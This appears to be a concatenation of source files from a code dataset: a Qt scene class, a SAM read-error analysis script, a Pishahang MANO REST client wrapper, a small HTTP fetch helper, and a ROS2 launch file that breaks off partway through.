                # Bg images are only editable when editing is on AND unlocked.
                _flg = self.enable_edit and not self.lock_bg_image
                _i.movable = _flg
                _i.setFlag(QtWidgets.QGraphicsItem.ItemIsMovable, _flg)
                _i.setFlag(QtWidgets.QGraphicsItem.ItemIsSelectable, _flg)

    def edit_bg_image_opacity(self, value):
        """ Set the opacity of every background image to 'value'. """
        for _i in self.items():
            if isinstance(_i, BgNode):
                _i.setOpacity(value)

    def add_to_group(self):
        """ Add the selected pickers to every selected group picker. """
        _p = self.get_selected_pick_nodes()
        for _g in self.get_selected_group_pick_nodes():
            _g.add(_p)

    def remove_from_group(self):
        """ Remove the selected pickers from every selected group picker. """
        _p = self.get_selected_pick_nodes()
        for _g in self.get_selected_group_pick_nodes():
            _g.remove(_p)

    def get_selected_pick_nodes(self):
        """ Return the selected Picker items. """
        return [_n for _n in self.selectedItems() if isinstance(_n, Picker)]

    def get_selected_group_pick_nodes(self):
        """ Return the selected GroupPicker items. """
        return [_n for _n in self.selectedItems() if isinstance(_n, GroupPicker)]

    def get_selected_all_pick_nodes(self):
        """ Return the selected Picker and GroupPicker items. """
        return [_n for _n in self.selectedItems() if isinstance(_n, (Picker, GroupPicker))]

    def drawBackground(self, painter, rect):
        """ Draw the background grid (every 5th line brighter). """
        if not self.draw_bg_grid:
            return
        scene_height = self.sceneRect().height()
        scene_width = self.sceneRect().width()
        # Pen.
        pen = QtGui.QPen()
        pen.setStyle(QtCore.Qt.SolidLine)
        pen.setWidth(1)
        pen.setColor(QtGui.QColor(80, 80, 80, 125))
        # Brighter pen for the major (every 5th) grid lines.
        sel_pen = QtGui.QPen()
        sel_pen.setStyle(QtCore.Qt.SolidLine)
        sel_pen.setWidth(1)
        sel_pen.setColor(QtGui.QColor(125, 125, 125, 125))
        grid_horizontal_count = int(round(scene_width / self.grid_width)) + 1
        grid_vertical_count = int(round(scene_height / self.grid_height)) + 1
        for x in range(0, grid_horizontal_count):
            xc = x * self.grid_width
            if x % 5 == 0:
                painter.setPen(sel_pen)
            else:
                painter.setPen(pen)
            painter.drawLine(xc, 0, xc, scene_height)
        for y in range(0, grid_vertical_count):
            yc = y * self.grid_height
            if y % 5 == 0:
                painter.setPen(sel_pen)
            else:
                painter.setPen(pen)
            painter.drawLine(0, yc, scene_width, yc)

    def add_item(self, widget):
        """ Add one widget (or a list of widgets) to the scene.

        Also keeps a Python-side reference (see __init__ note) and attaches
        a drop shadow to every added item.
        """
        if not isinstance(widget, list):
            widget = [widget]
        for _w in widget:
            self.add_items.append(_w)
            self.addItem(_w)
            _shadow = QtWidgets.QGraphicsDropShadowEffect(self)
            _shadow.setBlurRadius(10)
            _shadow.setOffset(3, 3)
            _shadow.setColor(QtGui.QColor(10, 10, 10, 150))
            _w.setGraphicsEffect(_shadow)
            if hasattr(_w, 'set_movable_flag_from_scene'):
                _w.set_movable_flag_from_scene()
            if hasattr(_w, 'set_selectable_flag_from_scene'):
                _w.set_selectable_flag_from_scene()

    def remove_item(self, widget):
        """ Remove one widget (or a list of widgets) from the scene.

        NOTE(review): assumes every widget was added via add_item();
        list.remove() raises ValueError otherwise -- confirm callers.
        """
        if not isinstance(widget, list):
            widget = [widget]
        for _w in widget:
            self.add_items.remove(_w)
            self.removeItem(_w)

    def clear(self):
        """ Remove every item from the scene and drop the reference list. """
        for _i in self.items():
            self.remove_item(_i)
        self.add_items = []
# -----------------------------------------------------------------------------
# EOF
# -----------------------------------------------------------------------------
| 2.171875 | 2 |
tools/scripts/sam-analysis.py | srirampc/ecet | 1 | 12766429 | <filename>tools/scripts/sam-analysis.py
#!/usr/bin/python
import sys
import argparse
import re
import alignment as an
import ecutils as eu
#
# File : sam-analyis.py
# Created on December 1, 2011
# Author : <NAME> <<EMAIL>>
#
# This file is part of Error Correction Review Toolkit.
# Error Correction Review Toolkit is free software: you can
# redistribute it and/or modify it under the terms of the GNU
# Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Error Correction Review Toolkit is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Libpnorm. If not, see <http://www.gnu.org/licenses/>.
#
# Map nucleotide characters (both cases, ambiguity codes Y/R, and the gap
# character '-') to the single-digit codes written into the error records.
charMapping = {'A':'0','C':'1','G':'2','T':'3','N':'4','-':'5',
               'a':'0','c':'1','g':'2','t':'3','n':'4',
               'Y':'6','R':'7',
               'y':'6','r':'7'}
alphabet = eu.alphabet
# Error type codes used by getErrorsFromAlignment:
# 0 = substitution, 1 = deletion, 2 = insertion.
error_types = [0,1,2]
complementMapping = eu.complementMapping
# Genome container: process() replaces this with eu.load_genome(...) when a
# genome file is supplied; getErrors() reads fgenome[0].
fgenome = { 0: None }
class SkipError(Exception):
    """ Signals that the current SAM record cannot be processed and
    should be skipped (caller logs it and counts it as ambiguous). """

    def __init__(self, value):
        # Keep the original payload for callers that inspect it.
        self.value = value

    def __str__(self):
        return repr(self.value)
# For the alignment build the error as a dictionary
# {
# pos : [ [true_base,wrong_base,type_of_error],...]
# ...
# }
def getErrorsFromAlignment(readString,refAlign,readAlign,flag):
    """ Compare the aligned read against the aligned reference.

    Returns a dict mapping every read position (0..len(readString)-1) to a
    list of [true_base_code, wrong_base_code, error_type] records, using the
    module-level charMapping codes and error_types (0=sub, 1=del, 2=ins).
    """
    l = len(refAlign)
    readl = len(readString)
    sofar = 0  # number of read characters consumed so far
    errors = {}
    revCompl = False
    if flag & 16 == 16:  # SAM flag 0x10: read aligned to the reverse strand
        revCompl = True
    for i in range(readl):
        errors[i] = []
    if revCompl:
        # Work in read orientation: flip both alignment strings.
        refAlign = eu.reverse_complement(refAlign)
        readAlign = eu.reverse_complement(readAlign)
    #print refAlign
    #print readAlign
    for i in range(l):
        tb = wb = '-'
        errtype = -1
        if readAlign[i] == '-' and refAlign[i] in alphabet:
            errtype = 1 # deletion error (missing char in the read after pos)
        elif refAlign[i] == '-' and readAlign[i] in alphabet:
            errtype = 2 # insertion error (extra char in read at pos)
        elif readAlign[i] != refAlign[i] and readAlign[i] in alphabet and refAlign[i] in alphabet:
            errtype = 0 # substition error
        if errtype in error_types:
            tb = charMapping[refAlign[i]] # true base
            wb = charMapping[readAlign[i]] # wrong base
            # NOTE(review): a deletion in the final alignment column (after
            # all read chars are consumed) would index errors[readl], which
            # does not exist -- confirm alignments never end in a deletion.
            errors[sofar] += [[tb,wb,errtype]] # error type
        if readAlign[i] != '-':
            sofar += 1
    #print errors
    return errors
def getErrors(readid,readString,cigarString,mdString,gpos,flag):
    """ Reconstruct the alignment for one SAM record and extract its errors.

    Returns [errors, sb, se] where 'errors' is the position->records dict
    from getErrorsFromAlignment, and sb/se delimit the aligned portion of
    the read (presumably clip boundaries from an.getSAMAlignment -- confirm).
    """
    errors = { 'id':readid }  # NOTE(review): overwritten below; dead value
    if mdString != None:
        # Keep only the value part of the 'MD:Z:...' optional field.
        mdString = mdString.split(':')[-1]
    #print readid,readString,cigarString, mdString
    [refAlign,readAlign,sb,se] = an.getSAMAlignment(readString,cigarString,mdString,
                                                    fgenome[0],gpos)
    errors = getErrorsFromAlignment(readString,refAlign,readAlign,flag)
    return [errors,sb,se]
def countErrors(errors):
    """ Return the total number of error records in an errors dictionary.

    'errors' maps read positions to lists of [true_base, wrong_base, type]
    records (as produced by getErrorsFromAlignment).
    """
    # Sum value lengths directly: the previous sorted-keys walk was an
    # unnecessary O(n log n) detour for a simple total.
    return sum(len(errlist) for errlist in errors.values())
def writeErrors(outf, readid, errors):
    """ Write one tab-separated error line for 'readid' to 'outf'.

    Line format: readid <TAB> error_count, then per error the fields
    pos, true_base, wrong_base, type.  Writes nothing when there are no
    error records.
    """
    fields = []
    count = 0
    for pos in sorted(errors.keys()):
        for record in errors[pos]:
            count += 1
            fields.append(str(pos))
            fields.extend(str(x) for x in record)
    if fields:
        outf.write('%s\t%d\t%s\n' % (readid, count, '\t'.join(fields)))
def processLine(line,outf,unmapf,ambf,trimf,dryRun):
    """ Classify one SAM record and write its errors / ids to the outputs.

    Returns (n_errors, clipped_len, n_unmapped, unmapped_len, n_ambiguous,
    ambiguous_len, n_mapped, mapped_len) for this single record; the caller
    accumulates these totals.
    """
    sminf = eu.getSAMinfo(line)
    nerrs = nunmap = nambig = nmapd = 0
    skipl = unmapLength = ambigLength = mapLength = 0
    readid = sminf['QNAME']
    flag = sminf['FLAG']
    mapqual = sminf['MAPQ']
    cigarString = sminf['CIGAR']
    gpos = sminf['POS']
    #asString = sminf['AS']
    #xtString = sminf['XT']
    readString = sminf['SEQ']
    readLen = len(readString)
    if flag & 4 == 4: # SAM flag 0x4: segment unmapped
        nunmap += 1; unmapLength += readLen
        if unmapf: unmapf.write(readid+'\n')
    elif mapqual == 0: # mapping quality 0 => ambiguously mapped read
        nambig += 1; ambigLength += readLen
        if ambf: ambf.write(readid + '\n')
    elif (cigarString != '*') and (mapqual != 0): #if read is uniqly aligned
        mdstring = sminf['MD']
        if mdstring == None and len(fgenome) == 0:
            eu.eprint("NO MD STRING / GENOME AVAILABLE !!!")
        assert mdstring != None
        try:
            [errors,sb,se] = getErrors(readid,readString,cigarString,mdstring,gpos,flag)
            if errors:
                nerrs += countErrors(errors)
                if outf:
                    writeErrors(outf,readid,errors)
            if sb + se != readLen:
                # Read is clipped: record the trim boundaries and count only
                # the aligned span as mapped length.
                if trimf:
                    trimf.write(readid + '\t' + str(se) + '\t' + str(sb) + '\n')
                skipl += sb + readLen - se
                mapLength = se - sb
                nmapd += 1
            else:
                mapLength = readLen
                nmapd += 1
        except SkipError as err:
            # Record could not be aligned/parsed: count it as ambiguous.
            eu.eprint('SKIP ' + readid + ' ' + str(err))
            if ambf: ambf.write(readid + '\n')
            nambig += 1; ambigLength += readLen
    else : # this is the case should not happen
        eu.eprint(str(readid) + ' is ambigous ')
    return (nerrs, skipl, nunmap, unmapLength, nambig, ambigLength, nmapd, mapLength)
def process(fileName,outFile,unmappedFile,ambigFile,genomeFile,trimFile,dryRun):
    """ Walk the SAM file, emit per-read error records and summary stats.

    fileName/outFile accept '-' for stdin/stdout; any output file may be
    None to skip that output.  A dry run disables every output file but
    still accumulates and prints the statistics.
    """
    #print "Processing",fileName
    global fgenome
    if dryRun:
        # (ambigFile is assigned twice here -- harmless redundancy.)
        outFile = ambigFile = unmappedFile = ambigFile = trimFile = None
    if genomeFile is not None: fgenome = eu.load_genome(genomeFile)
    inf = outf = unmapf = ambf = trimf = None
    terrs = tSkipLength = tMappedLength = 0
    tmapd = tunmapped = tUnmapLength = tambig = tAmbigLen = 0
    try:
        if unmappedFile is not None: unmapf = open(unmappedFile, 'w')
        if trimFile is not None: trimf = open(trimFile,'w')
        # Ambiguous reads share the unmapped file when both names match.
        if (unmappedFile != ambigFile) and (ambigFile is not None):
            ambf = open(ambigFile, 'w')
        if ambf is None: ambf = unmapf
        if outFile is not None:
            if outFile == "-":
                outf = sys.stdout
            else:
                outf = open(outFile, 'w')
        if fileName == "-":
            inf = sys.stdin
        else:
            inf = open(fileName, 'r')
        # eliminate first line
        for line in inf:
            if line[0] == '@': # skip header line
                continue
            try:
                (nerr,skipl,nunmap,unmapl,
                 nambig,ambigl,nmap,maplen) = processLine(line,outf,unmapf,
                                                          ambf,trimf,dryRun)
                terrs += nerr; tSkipLength += skipl
                tunmapped += nunmap; tUnmapLength += unmapl
                tambig += nambig; tAmbigLen += ambigl
                tmapd += nmap; tMappedLength += maplen
            except AssertionError, b:
                # Record is malformed (e.g. missing MD); log and continue.
                eu.eprint(b)
                eu.eprint(line)
    except IOError, ioe:
        eu.eprint("I/O Err " + str(ioe))
    if outf is not None: outf.close()
    if inf is not None: inf.close()
    if unmapf is not None: unmapf.close()
    if trimf is not None: trimf.close()
    if unmappedFile != ambigFile and ambf is not None: ambf.close()
    eu.eprint("------------------ SAM STATISTICS ------------------")
    eu.eprint('No. of errors              :{0:>11}'.format(terrs))
    eu.eprint('No. unmapped Reads         :{0:>11}'.format(tunmapped))
    eu.eprint('No. mapped Reads           :{0:>11}'.format(tmapd))
    eu.eprint('No. ambig Reads            :{0:>11}'.format(tambig))
    eu.eprint('No. ambig + unmap          :{0:>11}'.format(tambig + tunmapped))
    eu.eprint('Total mapped length        :{0:>11}'.format(tMappedLength))
    eu.eprint('Total unmapped length      :{0:>11}'.format(tUnmapLength))
    eu.eprint('Total clipped length       :{0:>11}'.format(tSkipLength))
    eu.eprint('Total ambiguous length     :{0:>11}'.format(tAmbigLen))
    eu.eprint('Total ambig + unmap length :{0:>11}'.format(tAmbigLen + tUnmapLength))
    eu.eprint("------------------ --------------- ------------------")
def verify(fileName,outfile,unmappedFile,ambigFile,genomeFile):
    """ Placeholder: re-check reported errors against the genome (unimplemented). """
    # TODO:
    # Load Genome
    # For each read in SAM file
    pass
def main(argv):
    """ Parse command-line arguments and run the SAM analysis. """
    parser = argparse.ArgumentParser()
    parser.add_argument("samFile",
                        help="/PATH/TO/INPUT-SAM-file (or) - (stdin)")
    parser.add_argument("outputErrFile",
                        help="/PATH/TO/OUT-ERR-file (or) - (stdout)")
    parser.add_argument("unmappedFile",
                        help="/PATH/TO/OUT-unmapped-file")
    parser.add_argument("-a", "--ambig",
                        help="/PATH/TO/OUT-ambigous-file")
    parser.add_argument("-t", "--trim",
                        help="/PATH/TO/OUT-trimmed-file")
    parser.add_argument("-g", "--genome",
                        help="/PATH/TO/INPUT-genome-file")
    parser.add_argument("-d", "--dry_run", action="store_true")
    try:
        args = parser.parse_args()
        # opts,args = getopt.getopt(argv,"f:o:u:a:t:g:dvh",["file=","outfile=",
        #                                                  "unmapped=", "ambig=",
        #                                                  "trim=","genome=",
        #                                                  "dry" "verify","help"])
    except argparse.ArgumentError as err:
        # NOTE(review): argparse normally handles errors internally and
        # exits; this handler presumably never fires -- confirm.
        eu.eprint(str(err))
        parser.print_help()
        sys.exit(2)
    # Get the command line arguments
    trimFile = ambigFile = filename = outfile = unmappedFile = None
    genomeFile = None
    # NOTE(review): 'verify' is never set to True below, so the verify
    # branch is unreachable -- confirm whether a -v option was intended.
    dryRun = verify = False
    filename = args.samFile
    outfile = args.outputErrFile
    unmappedFile = args.unmappedFile
    ambigFile = args.ambig
    genomeFile = args.genome
    trimFile = args.trim
    dryRun = args.dry_run
    eu.eprint("------------------ INPUT ARGUMENTS ------------------")
    eu.eprint("IN  SAM File (sorted)    : ", filename)
    eu.eprint("IN  Ref Genome File      : ", genomeFile)
    eu.eprint("OUT Mapped Reads File    : ", outfile)
    eu.eprint("OUT Unmapped Reads File  : ", unmappedFile)
    eu.eprint("OUT Ambigous Reads File  : ", ambigFile)
    eu.eprint("OUT Trim File            : ", trimFile)
    eu.eprint("Y/N Dry Run              : ", dryRun)
    eu.eprint("------------------ --------------- ------------------")
    if filename == None or outfile == None or unmappedFile == None:
        parser.print_help()
        sys.exit()
    if verify:
        if genomeFile == None:
            parser.print_usage()
            sys.exit()
        #verify(filename,outfile,unmappedFile,ambigFile,genomeFile)
        eu.eprint("--- VERIFY FUNCTION NOT IMPLEMENTED ---")
    else:
        # Process the file
        process(filename,outfile,unmappedFile,ambigFile,
                genomeFile,trimFile,dryRun)
# Script entry point: forward the command-line args (minus the program name).
if __name__ == "__main__":
    main(sys.argv[1:])
| 2.296875 | 2 |
wrappers/SONATAClient/pishahang.py | CN-UPB/python-mano-wrappers | 0 | 12766430 | <filename>wrappers/SONATAClient/pishahang.py<gh_stars>0
import json
import requests
class Pishahang():
"""
Pishahang Related Interfaces
"""
def __init__(self, host, port=4002, requests_port=32001, policy_port=8899):
self._host = host
self._port = port
self.policy_port = policy_port
self._requests_port = requests_port
self._base_path = 'http://{0}:{1}'
self._user_endpoint = '{0}'
def get_csd_descriptors(self, token, offset=None, limit=None, host=None, port=None):
""" CSD Package Management Interface - Cloud descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
if not offset:
offset = 0
if not limit:
limit = 10
_endpoint = "{0}/catalogues/api/v2/csds?offset={1}&limit={2}".format(base_path, offset, limit)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token)}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_csd_descriptors(self, token, package_path, host=None, port=None):
""" CSD Package Management Interface - Cloud descriptors
/vnf_descriptors:
POST - Create a new individual
VNFpackage resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_csd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/csd_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/csds".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def get_pd_descriptors(self, offset=None, limit=None, host=None, port=None):
""" PD Management Interface - Policy descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
_endpoint = "{0}/policy_descriptor".format(base_path)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json"}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_pd_descriptors(self, package_path, host=None, port=None):
""" PD Policy descriptors
/policy_descriptors:
POST - Create a new individual
Policy resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_pd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/policy_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json"}
_endpoint = "{0}/policy_descriptor".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_pd_descriptors_pdpkgid(self, pdpkgid, host=None, port=None):
""" PD Management Interface -
Individual PD package
:param token: auth token retrieved by the auth call
:param csdpkgid: id of the vnf package to fetch
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self.policy_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json"}
_endpoint = "{0}/policy_descriptor".format(base_path)
_data = { "name": pdpkgid }
try:
r = requests.delete(_endpoint, data=json.dumps(_data), params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def get_cosd_descriptors(self, token, offset=None, limit=None, host=None, port=None):
""" COSD Package Management Interface - Cloud descriptors
:param token: auth token retrieved by the auth call
:param offset: offset index while returning
:param limit: limit records while returning
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
if not offset:
offset = 0
if not limit:
limit = 10
_endpoint = "{0}/catalogues/api/v2/complex-services?offset={1}&limit={2}".format(base_path, offset, limit)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/json", 'Authorization': 'Bearer {}'.format(token)}
try:
r = requests.get(_endpoint, params=None, verify=False, stream=True, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.ok:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cosd_descriptors(self, token, package_path, host=None, port=None):
""" COSD Package Management Interface - Cloud descriptors
/vnf_descriptors:
POST - Create a new individual
VNFpackage resource
:param token: auth token retrieved by the auth call
:param package_path: file path of the package
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
response = json.loads(sonata_pishahang.post_cosd_descriptors(
token=_token["token"]["access_token"],
package_path="tests/samples/csd_example.yml"))
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/complex-services".format(base_path)
try:
r = requests.post(_endpoint, data=open(package_path, 'rb'), verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cs_instances_nsinstanceid_instantiate(self, token, nsInstanceId, egresses=[], ingresses=[], host=None, port=None):
""" NS (CS) Lifecycle Management Interface -
Instantiate CS task
:param token: auth token retrieved by the auth call
:param nsInstanceId: NS instaniation description
:param ingresses: ingresses list
:param egresses: egresses list
:param host: host url
:param port: port where the MANO API can be accessed
Example:
.. code-block:: python
sonata_pishahang = SONATAClient.Pishahang(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_cosd_list = json.loads(sonata_pishahang.get_cosd_descriptors(token=_token["token"]["access_token"]))
_cosd_list = json.loads(_cosd_list["data"])
_ns = None
for _n in _cosd_list:
if "A dummy Example." == _n['nsd']['description']:
_ns = _n['uuid']
if _ns:
response = json.loads(
sonata_pishahang.post_cs_instances_nsinstanceid_instantiate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
"""
if host is None:
base_path = self._base_path.format(self._host, self._requests_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {
"Content-Type": "application/json",
"accept": "application/json",
"Authorization": 'Bearer {}'.format(token)}
data = {
"service_uuid": nsInstanceId,
"egresses" : egresses,
"ingresses" : ingresses
}
_endpoint = "{0}/api/v2/requests".format(base_path)
try:
r = requests.post(_endpoint, params=None, verify=False,
headers=headers, json=data)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def post_cs_instances_nsinstanceid_terminate(self, token, nsInstanceId, host=None, port=None):
""" NS (CS) Lifecycle Management Interface -
Terminate CS task
:param token: auth token retrieved by the auth call
:param nsInstanceId: id of the NS instance
:param host: host url
:param port: port where the MANO API can be accessed
:param force: true/false whether to force terminate
"""
if host is None:
base_path = self._base_path.format(self._host, self._requests_port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {
"Content-Type": "application/json",
"accept": "application/json",
"Authorization": 'Bearer {}'.format(token)}
data = {
"service_instance_uuid": nsInstanceId,
"request_type": "TERMINATE"
}
_endpoint = "{0}/api/v2/requests".format(base_path)
try:
r = requests.post(_endpoint, params=None, verify=False,
headers=headers, json=data)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.created:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_cosd_descriptors_cosdpkgid(self, token, cosdpkgid, host=None, port=None):
""" COSD Management Interface - Individual COSD Descriptor
:param token: auth token retrieved by the auth call
:param cosdpkgid: id of the individual NSD
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", "accept": "application/json",
'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/complex-services/{1}".format(base_path, cosdpkgid)
try:
r = requests.delete(_endpoint, params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.no_content:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
def delete_csd_descriptors_csdpkgid(self, token, csdpkgid, host=None, port=None):
""" CSD Package Management Interface -
Individual CSD package
:param token: auth token retrieved by the auth call
:param csdpkgid: id of the vnf package to fetch
:param host: host url
:param port: port where the MANO API can be accessed
"""
if host is None:
base_path = self._base_path.format(self._host, self._port)
else:
base_path = self._base_path.format(host, port)
result = {'error': True, 'data': ''}
headers = {"Content-Type": "application/x-yaml", 'Authorization': 'Bearer {}'.format(token)}
_endpoint = "{0}/catalogues/api/v2/csds/{1}".format(base_path, csdpkgid)
try:
r = requests.delete(_endpoint, params=None, verify=False, headers=headers)
except Exception as e:
result['data'] = str(e)
return result
if r.status_code == requests.codes.no_content:
result['error'] = False
result['data'] = r.text
return json.dumps(result)
| 2.5 | 2 |
utils/verify.py | sweeneyngo/swvgio | 0 | 12766431 | <filename>utils/verify.py<gh_stars>0
import requests
def grab(url, params=None):
    """Fetch *url* with a streamed HTTP GET and return the Response.

    Returns None when the request times out or hits too many redirects
    (after printing a message); any other request error exits the program.

    :param url: URL to fetch
    :param params: optional query parameters passed to requests.get
    """
    try:
        r = requests.get(url, params=params, stream=True)
    except requests.exceptions.Timeout:
        # Maybe set up for a retry, or continue in a retry loop
        print("Timed out...")
        # BUGFIX: 'r' was never bound here, so falling through to
        # 'return r' raised UnboundLocalError.
        return None
    except requests.exceptions.TooManyRedirects:
        # Tell the user their URL was bad and try a different one
        print("Invalid URL, check its validity first.")
        return None  # BUGFIX: same unbound-local problem as above
    except requests.exceptions.RequestException as e:
        print("Unknown error, exiting immediately.")
        raise SystemExit(e)
    return r
| 3.09375 | 3 |
orca_driver/launch/pt2_launch.py | tsaoyu/orca2 | 0 | 12766432 | <reponame>tsaoyu/orca2
import os
import math
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
# Launch pool test #2
def generate_launch_description():
    """Build the ROS2 launch description for pool test #2.

    Starts robot_state_publisher (static joints from the URDF), the forward
    camera driver, the hardware driver, the AUV controller, and the
    fiducial_vlam mapper/localizer with pool-test-tuned parameters.
    """
    # Must match camera name in URDF file
    camera_name = 'forward_camera'
    camera_frame = 'forward_camera_frame'
    # Resolve the URDF and the fiducial marker map from their packages' share dirs
    orca_description_path = get_package_share_directory('orca_description')
    urdf_path = os.path.join(orca_description_path, 'urdf', 'pt2.urdf')
    orca_driver_path = get_package_share_directory('orca_driver')
    map_path = os.path.join(orca_driver_path, 'maps', 'simple_map.yaml')
    return LaunchDescription([
        # Publish static joints
        Node(package='robot_state_publisher', node_executable='robot_state_publisher', output='log',
             arguments=[urdf_path]),
        # Forward camera
        Node(package='orca_driver', node_executable='opencv_camera_node', output='log',
             node_name='opencv_camera_node', remappings=[
                ('image_raw', '/' + camera_name + '/image_raw'),
                ('camera_info', '/' + camera_name + '/camera_info'),
            ]),
        # Driver
        Node(package='orca_driver', node_executable='driver_node', output='log',
             node_name='driver_node', parameters=[{
                'voltage_multiplier': 5.05,
                'thruster_4_reverse': True,  # Thruster 4 ESC is programmed incorrectly
                'tilt_channel': 6,
                'voltage_min': 12.0
            }]),
        # AUV controller
        Node(package='orca_base', node_executable='base_node', output='log',
             node_name='base_node', parameters=[{
                'auto_start': 5,  # Auto-start mission >= 5
                'auv_z_target': -0.5,
                'auv_xy_distance': 2.0,
                # PID gains all zero — presumably still to be tuned; TODO confirm
                'auv_x_pid_kp': 0.0,  # TODO
                'auv_x_pid_ki': 0.0,
                'auv_x_pid_kd': 0.0,
                'auv_y_pid_kp': 0.0,
                'auv_y_pid_ki': 0.0,
                'auv_y_pid_kd': 0.0,
                'auv_z_pid_kp': 0.0,
                'auv_z_pid_ki': 0.0,
                'auv_z_pid_kd': 0.0,
                'auv_yaw_pid_kp': 0.0,
                'auv_yaw_pid_ki': 0.0,
                'auv_yaw_pid_kd': 0.0,
            }], remappings=[
                ('filtered_odom', '/' + camera_name + '/base_odom')
            ]),
        # Mapper
        Node(package='fiducial_vlam', node_executable='vmap_node', output='log',
             node_name='vmap_node', parameters=[{
                'publish_tfs': 1,
                'marker_length': 0.1778,
                'marker_map_load_full_filename': map_path,
                'make_not_use_map': 0,
                # 'map_init_style': 1,  # Init style 1: marker id and location is specified below:
                # 'map_init_id': 0,
                # 'map_init_pose_x': 0.0,
                # 'map_init_pose_y': 0.0,
                # 'map_init_pose_z': -0.5,
                # 'map_init_pose_roll': math.pi / 2,
